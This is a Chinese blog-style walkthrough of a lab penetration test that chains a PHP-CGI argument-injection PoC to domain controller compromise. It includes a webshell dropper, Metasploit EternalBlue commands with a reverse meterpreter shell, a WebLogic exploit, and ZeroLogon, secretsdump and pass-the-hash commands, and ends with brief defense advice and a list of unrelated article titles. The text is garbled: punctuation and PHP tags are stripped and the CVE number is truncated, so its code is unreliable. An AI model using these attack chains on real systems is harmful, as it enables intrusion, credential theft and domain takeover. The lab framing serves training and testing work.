当前位置：首页 > article >正文

手把手复现一次完整的VPC内网渗透：从PHP-CGI漏洞到拿下域控的实战记录

article 2026/5/7 15:07:26

从外网到域控VPC环境下的渗透测试实战全解析当企业将业务迁移到云端时虚拟私有云(VPC)常被视为安全的堡垒。但真实情况是任何网络环境都可能存在薄弱环节。本文将带您体验一次完整的渗透测试过程从外网的一个看似普通的Web漏洞开始逐步深入内网最终获取域控制器权限。1. 环境搭建与初始侦察在开始实战之前我们需要搭建一个模拟的VPC环境。这个环境包含多个子网每个子网运行不同的操作系统和服务外网区域运行易受攻击的PHP-CGI服务(Windows Server 2012)办公网段Windows 7和Windows 10客户端应用服务器区运行Weblogic的Windows Server 2012 R2核心业务区域控制器(Windows Server 2016)网络配置的关键点在于网卡名称IP网段连接的系统vmware2192.168.2.0Windows 7, Windows 10vmware3192.168.3.0Windows 10, Weblogic服务器vmware11192.168.10.0域控制器和Web服务器提示在实际测试中确保所有服务(XAMPP、Weblogic等)已正确启动否则会影响渗透流程。2. 外网突破口PHP-CGI漏洞利用我们的渗透测试从外网的PHP-CGI漏洞(CVE-2024)开始。这个漏洞允许攻击者通过精心构造的请求执行任意代码。漏洞利用步骤发送特制的POST请求到php-cgi.exe利用auto_prepend_file参数执行系统命令上传Webshell获取持久化访问以下是利用该漏洞的PoC代码POST /php-cgi/php-cgi.exe?%ADdcgi.force_redirect%3D0%ADdallow_url_include%3Don%ADdauto_prepend_file%3Dphp%3A//input HTTP/1.1 Host: 目标IP Content-Type: application/x-www-form-urlencoded Content-Length: 22 ?php system(whoami);?成功执行命令后我们可以上传更强大的Webshell。使用以下代码创建一个简单的PHP后门?php file_put_contents(../htdocs/shell.php,?php eval($_POST[cmd]);?);?3. 内网横向移动从Web服务器到域控获得Web服务器权限后我们开始内网渗透。这个过程需要系统性地进行信息收集扫描内网存活主机和开放端口漏洞利用针对不同系统选择合适的攻击方式权限提升从普通用户提升到管理员权限凭证窃取获取更多系统的访问凭证3.1 利用MS17-010漏洞在内网中发现Windows 7主机存在MS17-010(EternalBlue)漏洞。由于防火墙限制我们需要使用反向连接use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOSTS 192.168.2.128 set LHOST 192.168.2.140 set LPORT 1113 exploit成功利用后我们可以上传Cobalt Strike beacon获取更稳定的控制使用Mimikatz提取凭证建立SOCKS代理穿透内网3.2 跨网段攻击Weblogic服务器通过已控制的Windows 10主机我们发现192.168.3.0网段存在Weblogic服务器。建立代理后我们可以利用Weblogic反序列化漏洞proxychains4 python3 exploit_weblogic.py 192.168.3.128 7001成功利用后我们获得了Weblogic服务器的系统权限并发现了通往域控制器的路径。4. 最终目标攻陷域控制器在接近域控制器的过程中我们发现可以利用CVE-2020-1472(ZeroLogon)漏洞直接获取域控权限。这个漏洞允许攻击者在不需要任何凭证的情况下完全控制域控制器。攻击步骤利用漏洞重置域控的机器账户密码使用空密码获取域控的NT哈希使用哈希传递攻击获取完整控制权具体操作命令proxychains4 python3 cve-2020-1472-exploit.py dc 192.168.10.10 proxychains4 python3 secretsdump.py dc\$192.168.10.10 -just-dc -no-pass python wmiexec.py -hashes NT哈希 administrator192.168.10.105. 渗透后的思考与防御建议完成这次渗透测试后有几个关键发现值得注意漏洞链效应单个漏洞可能看起来危害不大但组合利用可以造成严重后果内网信任问题内网系统间的过度信任是攻击者横向移动的温床凭证管理薄弱明文存储或弱密码会大大降低攻击难度防御建议及时修补已知漏洞特别是MS17-010和ZeroLogon这类高危漏洞实施网络分段限制不同安全级别区域间的通信启用多因素认证和强密码策略定期进行渗透测试发现并修复安全问题

手把手复现一次完整的VPC内网渗透：从PHP-CGI漏洞到拿下域控的实战记录

相关文章：

手把手复现一次完整的VPC内网渗透：从PHP-CGI漏洞到拿下域控的实战记录

Hearthstone-Script完整指南：免费自动化你的炉石传说游戏体验

DeepSeek-V4本地部署全指南：vLLM分布式推理+量化配置

不止于Demo：为SeamlessM4T模型快速搭建一个带鉴权的Flask API接口（附Nginx配置与文件访问）

生产级 Agent 架构：限流、缓存、降级、监控全攻略

轻量级服务器控制面板ClawPanel：可视化Nginx与SSL证书管理实践

别再手动写归一化了！PyTorch里F.normalize的L1、L2范数到底怎么选？

Git三个主要区域介绍（工作区Working Directory、暂存区Staging Area、仓库区Repository）

【AISMM模型失效预警】：为什么83%的技术团队误用该模型？资深架构师紧急纠偏指南

智元Fast API SDK：统一LLM API网关的设计、部署与Go实战

GEO 不是玄学｜5 月谷歌给了明确标准✨

开源社区治理框架：从宪法元协议到可执行代码的实践指南

MelonLoader：Unity游戏模组加载器的5个关键问题与解决方案

避坑指南：Nebula Graph分布式集群部署后，如何解决‘Host not enough’和监控Dashboard连接失败？

VisualCppRedist AIO：Windows系统VC++运行库的终极一站式解决方案

快手无水印视频下载神器：KS-Downloader 终极使用指南

掌握Obsidian Tasks优先级管理：6个等级让任务管理更高效

如何用Translumo实现游戏与视频的实时屏幕翻译：终极免费解决方案

MAA智能辅助工具：3分钟掌握明日方舟全自动游戏管理方案

如何快速配置「阅读」APP：26个高质量书源一键导入终极指南

GoldHEN游戏修改工具：开源PS4游戏增强软件的完整指南

3步实现单电脑多人游戏：Universal Split Screen让你的聚会游戏体验升级 [特殊字符]

去中心化数据同步：构建自主可控的Any-Sync系统

如何免费快速恢复丢失数据：TestDisk PhotoRec终极指南

OpenClaw远程部署实战：MiniMax模型与Telegram机器人集成指南

为什么 MCP 在协议层会有 prompt injection的问题：工具描述如何劫持 agent 上下文

3分钟永久备份QQ空间：GetQzonehistory完整历史说说导出指南

Claude Code Agent 与团队系统技术文档

用Python的random库写个彩票小工具，顺便聊聊伪随机数的那些事儿

告别枯燥控件讲解！用WinForm手撸一个简易学生信息管理系统（C# .NET Framework）